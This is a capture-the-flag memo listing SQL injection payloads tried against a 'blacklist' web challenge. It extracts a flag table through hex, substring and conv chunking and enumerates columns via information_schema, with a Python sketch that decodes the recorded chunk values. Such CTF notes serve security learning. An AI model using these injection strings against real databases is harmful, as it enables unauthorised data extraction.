st98/memo.txt Secret

Created December 11, 2014 23:37
Advent Calendar CTF 2014 Day 10: blacklist (web)
A record of my trial and error; I did not understand MySQL's behavior well
---
A', '127.0.0.1');#
A' 'B', '127.0.0.1')#
A' (select flag from flag), '127.0.0.1')#
' + @@VERSION, '127.0.0.1')#
' + hex('AB'), '127.0.0.1')#
' + (select 1), '127.0.0.1')#
' + hex((select 16)), '127.0.0.1')#
' + length(hex((select * from flag))), '127.0.0.1')# => 66
' + hex((select * from flag)), '127.0.0.1')# => 41444354465
' + substring(hex((select * from flag)), 1, 8), '127.0.0.1')# => 41444354
' + conv('aaaaaaaa', 16, 10), '127.0.0.1')#
' + conv(hex((select * from flag)), 16, 10), '127.0.0.1')#
' + conv(substring(hex((select * from flag)), 1, 8), 16, 10), '127.0.0.1')# => 1094992724
' + conv(substring(hex((select * from flag)), 9, 8), 16, 10), '127.0.0.1')# => 1180656688
' + conv(substring(hex((select * from flag)), 17, 8), 16, 10), '127.0.0.1')# => 1598975828
' + conv(substring(hex((select * from flag)), 25, 8), 16, 10), '127.0.0.1')# => 1599435571
' + conv(substring(hex((select * from flag)), 33, 8), 16, 10), '127.0.0.1')# => 1598444899
' + conv(substring(hex((select * from flag)), 41, 8), 16, 10), '127.0.0.1')# => 1261522527
' + conv(substring(hex((select * from flag)), 49, 8), 16, 10), '127.0.0.1')# => 946615395
' + conv(substring(hex((select * from flag)), 57, 8), 16, 10), '127.0.0.1')# => 1800155507
' + conv(substring(hex((select * from flag)), 65, 8), 16, 10), '127.0.0.1')# => 84
A' (select group_concat(flag, '|') from flag), '127.0.0.1')#
A' (select group_concat(column_name, '|') from information_schema.columns), '127.0.0.1')#
the flag is ' (select column_name from information_schema.columns where table_name='flag'), '127.0.0.1')#
concat(select group_concat(column_name,'|') from information_schema.columns where table_name='flag')
//**/** => /**
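
Added example, not part of the original memo: a Python sketch of why the `' + hex(...)` result above stops at 41444354465 and how the nine conv(substring(...), 16, 10) results fit back together. The numbers are copied from the "=>" results in the memo; `numeric_prefix`, `rebuild_hex` and `decode` are hypothetical helper names, and `numeric_prefix` is a simplified model of MySQL's string-to-number coercion, not MySQL's own code.

```python
import re

HEX_LENGTH = 66  # "=> 66" from the length(hex(...)) line in the memo
CHUNK = 8        # width used in substring(hex(...), n, 8)
# Decimal results of the nine conv(substring(...), 16, 10) lines, in order.
CHUNK_VALUES = [1094992724, 1180656688, 1598975828, 1599435571, 1598444899,
                1261522527, 946615395, 1800155507, 84]


def numeric_prefix(text):
    """Simplified model (assumption) of string-to-number coercion in a
    numeric context such as '' + hex(...): keep the leading run of decimal
    digits, 0 if there is none. Sign, '.' and exponents are ignored."""
    match = re.match(r"\d+", text)
    return int(match.group()) if match else 0


def rebuild_hex(values, total_len=HEX_LENGTH, chunk=CHUNK):
    """Turn the decimal chunk values back into one hex string."""
    parts = []
    for index, value in enumerate(values):
        # Every chunk is `chunk` hex digits wide except a shorter last one.
        width = min(chunk, total_len - index * chunk)
        digits = format(value, "X")
        if width <= 0 or len(digits) > width:
            raise ValueError(f"chunk {index} does not fit the stated length")
        parts.append(digits.zfill(width))  # conv() drops leading zeros
    joined = "".join(parts)
    if len(joined) != total_len:
        raise ValueError("chunks do not cover the stated hex length")
    return joined


def decode(values):
    """Hex string back to the text that hex() was applied to."""
    return bytes.fromhex(rebuild_hex(values)).decode("ascii")


if __name__ == "__main__":
    hex_text = rebuild_hex(CHUNK_VALUES)
    # The unchunked hex string is cut at its first A-F digit when coerced.
    print("coerced whole string:", numeric_prefix(hex_text))
    print("decoded length:", len(decode(CHUNK_VALUES)))
```
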